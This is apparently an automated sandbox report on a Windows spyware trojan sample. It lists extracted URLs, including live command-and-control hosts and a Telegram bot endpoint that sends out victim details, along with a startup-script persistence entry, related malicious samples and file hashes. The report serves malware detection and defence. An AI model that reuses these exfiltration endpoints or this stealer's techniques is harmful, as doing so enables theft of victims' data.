https://duckduckgo.com/ac/?q=	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org	svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/lB	svchost.exe, 00000008.00000002.2547584481.0000000005715000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005950000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org	svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en	svchost.exe, 0000000B.00000002.2547860084.0000000005924000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005955000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=en8	svchost.exe, 0000000B.00000002.2547860084.000000000591F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000058F6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://varders.kozow.com:8081	svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	false		high
http://aborters.duckdns.org:8081	svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ac.ecosia.org/autocomplete?q=	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.office.com/8	svchost.exe, 0000000B.00000002.2547860084.0000000005946000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anotherarmy.dns.army:8081	svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
http://checkip.dyndns.org/q	svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore?hl=enlB	svchost.exe, 00000008.00000002.2547584481.00000000056E4000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.189$	svchost.exe, 00000008.00000002.2547584481.00000000055BC000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.000000000580B000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org	svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005602000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/8.46.123.1898	svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.orgch8	svchost.exe, 0000000B.00000002.2547860084.0000000005850000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	svchost.exe, 00000008.00000002.2547584481.0000000005541000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005791000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:399601%0D%0ADate%20a	svchost.exe, 00000008.00000002.2547584481.0000000005628000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.0000000005877000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	svchost.exe, 00000008.00000002.2550139780.00000000065F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2550139780.00000000065C5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006841000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2550365805.0000000006815000.00000004.00000800.00020000.00000000.sdmp	false		high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	false		high
https://reallyfreegeoip.org/xml/	svchost.exe, 00000008.00000002.2553455358.0000000007E90000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2552848077.0000000007E00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.2547584481.0000000005592000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1321042320.000000000326D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2546128575.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000003.1448678838.000000000366E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2553396035.0000000007D30000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2554818503.0000000008100000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 0000000B.00000002.2547860084.00000000057E1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000B.00000002.2546638115.0000000003774000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583657
Start date and time:	2025-01-03 09:20:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	FACT0987789000900.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@10/6@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 59 Number of non-executed functions: 303
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 172.202.163.200
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:21:13	API Interceptor	2784896x Sleep call for process: svchost.exe modified
09:21:10	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\juvenile.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	XClient.exe	Get hash	malicious	XWorm	Browse
188.114.96.3	QUOTATION_NOVQTRA071244#U00b7PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/u7ghXEYp/download
	CV_ Filipa Barbosa.exe	Get hash	malicious	FormBook	Browse	www.mffnow.info/1a34/
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	www.mydreamdeal.click/1ag2/
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	www.questmatch.pro/ipd6/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/I7fmQg9d/download
	need quotations.exe	Get hash	malicious	FormBook	Browse	www.rtpwslot888gol.sbs/jmkz/
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/Bh1Kj4RD/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/XrlEIxYp/download
132.226.247.73	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	checkip.dyndns.org/
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	D.G Governor Istek,Docx.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger	Browse	checkip.dyndns.org/
	0001.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	ugpJX5h56S.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.97.3
checkip.dyndns.com	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	158.101.44.242
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	PO_KB#67897.cmd	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	193.122.130.0
api.telegram.org	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	vEtDFkAZjO.exe	Get hash	malicious	RL STEALER, StormKitty	Browse	149.154.167.220
	Invoice-BL. Payment TT $ 28,945.99.exe	Get hash	malicious	AsyncRAT, StormKitty, WorldWind Stealer	Browse	149.154.167.220
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://telegra.ph/Clarkson-122025-01-02	Get hash	malicious	Unknown	Browse	149.154.167.99
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	mcgen.exe	Get hash	malicious	Blank Grabber	Browse	149.154.167.220
	eP6sjvTqJa.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	YGk3y6Tdix.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	CenteredDealing.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	Etqq32Yuw4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	over.ps1	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	Setup.msi	Get hash	malicious	Unknown	Browse	104.21.32.1
	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12	Get hash	malicious	Unknown	Browse	1.1.1.1
	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	104.20.4.235
	https://myburbank-uat.3didemo.com	Get hash	malicious	HTMLPhisher	Browse	104.26.13.57
	hiwA7Blv7C.exe	Get hash	malicious	Xmrig	Browse	172.67.19.24
	http://hotelyetipokhara.com	Get hash	malicious	Unknown	Browse	104.21.96.1
	https://realpaperworks.com/wp-content/red/UhPIYa	Get hash	malicious	Unknown	Browse	104.21.96.1
	http://adflowtube.com	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://authmycookie.com	Get hash	malicious	Unknown	Browse	172.67.198.196
UTMEMUS	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	DEMONS.ppc.elf	Get hash	malicious	Unknown	Browse	132.226.227.252
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.8.169
	Requested Documentation.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	132.226.247.73
	Dotc67890990.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	Azygoses125.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	PARATRANSFARI REMINDER.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Invoice DHL - AWB 2024 E4001 - 0000731.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-090971819130-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	PO_B2W984.com	Get hash	malicious	DBatLoader, MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	PO_4027_from_IC_Tech_Inc_6908.exe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	NL Hybrid.exe	Get hash	malicious	Titanium Proxy, PureLog Stealer	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	2Mi3lKoJfj.exe	Get hash	malicious	Quasar	Browse	149.154.167.220
	RFQ-12202431_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	RFQ-12202431_ACD_Group.pif.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	ogVinh0jhq.exe	Get hash	malicious	DCRat	Browse	149.154.167.220
	Sylacauga AL License.msg	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://www.gazeta.ru/politics/news/2024/12/22/24684854.shtml	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	image.exe	Get hash	malicious	DBatLoader, PureLog Stealer, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	DHL DOC INV 191224.gz.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	NOTIFICATION_OF_DEPENDANTS_1.vbs	Get hash	malicious	Xmrig	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\FACT0987789000900.exe
File Type:	data
Category:	dropped
Size (bytes):	202424
Entropy (8bit):	7.98496561474961
Encrypted:	false
SSDEEP:	6144:HsqRLT5hm7qJvUW7JOQVnr2R+UtSXAU3xRgO5aIf:HJRLrmWXNznScUtmA6CO48
MD5:	680BA9E14DFE80F9E58D784B4A8B4812
SHA1:	D269305611A554ABC239C8E5011045A67F0315E7
SHA-256:	057F87AE282514DCE6DC80C50372A1F0F0B0CE5889A0B1BC6EE8D340C53FF310
SHA-512:	3A5BAD82E729E15126C687440B40331AE5D3DEB774366875F00D5067C4FEB0A3FF64336C15BA853CA99F87BBA6DA8AC21E0D91749C487C1958B7741024D050BC
Malicious:	false
Reputation:	low
